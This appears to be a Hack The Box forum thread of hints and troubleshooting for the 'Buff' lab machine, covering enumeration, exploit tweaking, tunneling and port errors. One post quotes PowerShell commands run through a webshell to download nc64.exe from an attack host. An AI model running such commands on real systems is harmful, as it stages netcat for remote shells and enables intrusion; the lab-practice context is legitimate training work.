Official Buff Discussion


Comments

  • @orc said:

    Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

    Look at a different page. Gather information and see what you can do with it.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

  • @choupit0 said:

    @lovesay said:

    What is a surefire way to get a file onto the remote machine via a webshell? If I don't run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I'm hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

    I have tried the following:

    IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

    Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

    powershell.exe wget http://10.10.xx.xx/nc64.exe

    And the curl command?... Directly from the directory where your shell landed.

    Yeah that works too. Thanks for the insight. I'm just glad I was able to confirm that these commands should work when input correctly rather than thinking it was something else.

  • edited July 2020

    Is unbearable lag supposed to be part of the challenge?
    I've gotten user but can't proceed to basic enum since the box is evidently running on vacuum tubes.

  • @red404 said:

    Is unbearable lag supposed to be part of the challenge?
    I've gotten user but can't proceed to basic enum since the box is evidently running on vacuum tubes.

    This isn't something I noticed. It may depend on many variables.

    TazWake


  • Can someone help me? When tunneling I get this error "failed: Network error: Address already in use".

  • @regrews said:

    Can someone help me? When tunneling I get this error "failed: Network error: Address already in use".

    It implies a port you are trying to use is already being used by something.

    TazWake


  • Bit of a noob here. I'm looking to gain access and found the a**** page and I know there's a method there. Can someone give me a nudge on what my next step should be? Looking for a direction.

  • edited July 2020

    Does anyone have a resource that can help me set up the p****.*** connection? I've got user, an exploit for root, and I know where it needs to go, but I'm no bridge builder yet.

    elseif

  • edited July 2020

    @elseif said:

    Does anyone have a resource that can help me set up the p****.*** connection? I've got user, an exploit for root, and I know where it needs to go, but I'm no bridge builder yet.

    You can find plenty of resources on how to build a bridge with p*. Google and you will find what you need.
    If you still don't find what you need, I think there is a video from ippsec that covers the tool (go to ippsec.rocks and find your grail).

    Other tools also can be used to make your way if you are more familiar with them, but you need to upload them (like c****l).

    'These violent delights have violent ends'

  • @NiroSpecter said:

    Bit of a noob here. I'm looking to gain access and found the a**** page and I know there's a method there. Can someone give me a nudge on what my next step should be? Looking for a direction.

    I would look at different pages. If you enumerate what is shown, there is a big sign which says what you need to do to exploit the box.

    As an example, I rooted the box before I realised the page you mention even existed.

    TazWake


  • Is it just me, or is this box not responding rn?

  • At some point it would be a good idea for HTB to enforce a limit on machine resets based on user. This will force the players to be a little bit more creative and careful.

    Having to re-establish your user shell every 3-5 minutes does not help anyone.

    Rayz

  • @Rayz said:

    At some point it would be a good idea for HTB to enforce a limit on machine resets based on user. This will force the players to be a little bit more creative and careful.

    Having to re-establish your user shell every 3-5 minutes does not help anyone.

    I think non-VIP users have a limited number of resets. Unfortunately, if 500 people are hitting a box, even one reset each is challenging.

    TazWake


  • Just a couple of general comments based on questions I've been getting:

    1) If you use an exploit from ExploitDB - make sure you read it to understand what it is doing. If you simply copy and paste it as is there is a really good chance it won't work.

    2) Read the comments/instructions but they aren't always correct. Read them and see if you can follow the bits in the code to see what you'd need to do differently in practice.

    3) Think about networking. If you are pushing multiple connections, you need multiple ports.

    TazWake

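The "Address already in use" error reported earlier in the thread and point 3 above (one port per connection) come down to the same rule: only one socket can bind a given local address and port. The script below is an added example, not code from this thread or from Hack The Box; it checks whether a local TCP port is free by attempting the same bind a listener would perform, and finds the first free port in a range. The host and the 4444-4450 range are placeholder values.

```python
import errno
import socket


def port_in_use(port, host="127.0.0.1"):
    """Return True if a TCP bind on host:port fails with EADDRINUSE.

    Binding is exactly what a listener (a tunnel endpoint, a Python
    http.server, a catch-all listener) does first, so this reproduces the
    failure behind "Address already in use" without starting anything.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        try:
            probe.bind((host, port))
        except OSError as exc:
            if exc.errno == errno.EADDRINUSE:
                return True
            raise  # permission or address errors are a different problem
    return False


def find_free_port(start, end, host="127.0.0.1"):
    """Return the first port in [start, end] that is not bound, or None."""
    for port in range(start, end + 1):
        if not port_in_use(port, host):
            return port
    return None


def demonstrate():
    """Hold a throwaway listener and show the check flipping to 'in use'.

    Returns (in_use_while_held, in_use_after_release); expected (True, False).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as holder:
        holder.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
        holder.listen(1)
        port = holder.getsockname()[1]
        while_held = port_in_use(port)
    after_release = port_in_use(port)  # listener closed, port is free again
    return while_held, after_release


if __name__ == "__main__":
    print("listener held / released:", demonstrate())
    # Constructed range; replace with the ports you actually plan to use.
    print("first free port in 4444-4450:", find_free_port(4444, 4450))
```

When the error shows up, the port is usually still held by an earlier listener or tunnel that was never closed; on Linux `ss -ltnp` lists listening sockets with their owning process, which is quicker than guessing a new port.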

  • I don't know if it is a bug or something like that, but the service running on a port is highly unstable. Yesterday I was able to get a root shell which died because of AV, but today I can't even do this since the port is not listening and restarting the program doesn't help at all. I was resetting the box for multiple hours to do the step that I have already done but no luck. This is very frustrating guys.

  • edited July 2020

    Use pxxxxxx version, use nx for sxxxxxxxx

    Hack The Box

  • First a caveat that it may well depend on what other people are doing - if people are launching stupid attacks, stupid things happen.

    With that said, I found this pretty rock solid. The exploit worked the first time and the connection was stable enough for me to look around for as long as I wanted. Both user and root felt robust.

    Having said that, remember you are exploiting a system to make it do things it wasn't ever designed to do. If you are overflowing a buffer and pushing shellcode into memory you will never have a totally stable environment. People need to expect exploits to fail sometimes and occasionally you will need to run it 3, 4 or more times to get it to work. This isn't a problem with the "box", it's the nature of exploitation.

    TazWake


  • So the user was pretty easy. My problem is with root; I have tried different exploits but no luck. Any useful ideas?

    Blacksnufkin

  • edited July 2020

    @Blacksnufkin said:

    So the user was pretty easy. My problem is with root; I have tried different exploits but no luck. Any useful ideas?

    Did you modify the payload of each exploit? Did you try all the exploits that you have found?

    'These violent delights have violent ends'

  • edited July 2020

    @lovesay said:

    @Phrenesis2k said:

    Invoke-WebRequest should work. Try a full path in the -outfile

    That was it, so it seems. Thank you so much. The issue now is some kind of lag that causes the file not to be downloaded. It shows the file in the remote machine's directory but with size 0. I assume this is a network issue.

    Update: Running a personal VPN on top of OpenVPN seems to cause some issues.

    I agree, I had to connect to the HTB OpenVPN first, which defeats the purpose of a personal VPN. I think it has to do with the name of the interface, because I could connect to my personal VPN after I connected to the HTB VPN. I haven't had a chance to check the .ovpn. The problem: your public IP might not be hidden if you have to connect to HTB first. I think the admins of this site do the best they can to make sure you are not exposed, but nothing is 100% secure, EVER. Sorry, probably the wrong place to have this discussion.

    Huejash0le

  • @Caracal said:

    @Blacksnufkin said:

    So the user was pretty easy. My problem is with root; I have tried different exploits but no luck. Any useful ideas?

    Did you modify the payload of each exploit? Did you try all the exploits that you have found?

    Yes I did, probably not the right modifications.

    Blacksnufkin

  • Spoiler Removed

  • Spoiler Removed

    Fr0Ggi3sOnTour

  • edited July 2020

    Spoiler Removed

    Fr0Ggi3sOnTour

  • Rooted. Feel free to pm for a nudge but make sure you're prepared to tell me what you've tried first.

    Hack The Box

  • edited July 2020

    @choupit0

    Give hints but do not explain each step of privesc, because it's still a spoiler.
    Like the HTB rules say: Don't share how you hacked each machine with other members.

    https://www.hackthebox.eu/home/rules

    'These violent delights have violent ends'

  • @Caracal said:

    @choupit0

    Give hints but do not explain each step of privesc, because it's still a spoiler.
    Like the HTB rules say: Don't share how you hacked each machine with other members.

    https://www.hackthebox.eu/home/rules

    Okay.

    Fr0Ggi3sOnTour

  • I'm sorry for the silly question. I have scanned and enumerated, found an exploit on exploit-db, modified it to work (some parentheses) and ran it against Buff. It says successfully connected to webshell but then immediately exits without the shell. Some hint? Thank you in advance.

  • @maurotambo said:

    I'm sorry for the silly question. I have scanned and enumerated, found an exploit on exploit-db, modified it to work (some parentheses) and ran it against Buff. It says successfully connected to webshell but then immediately exits without the shell. Some hint? Thank you in advance.

    If this is for user then the exploit doesn't really give you a shell (well it does, but this sucks and you quickly want something else), it gives you RCE.

    If you read the instructions in the exploit it tells you what you need to do - although some of this is wrong, you can work out what you need to change by the code of the exploit.

    TazWake


  • edited July 2020

    @maurotambo said:

    I'm sorry for the silly question. I have scanned and enumerated, found an exploit on exploit-db, modified it to work (some parentheses) and ran it against Buff. It says successfully connected to webshell but then immediately exits without the shell. Some hint? Thank you in advance.

    You need to hit the right page and give the right parameters to have RCE.

    'These violent delights have violent ends'
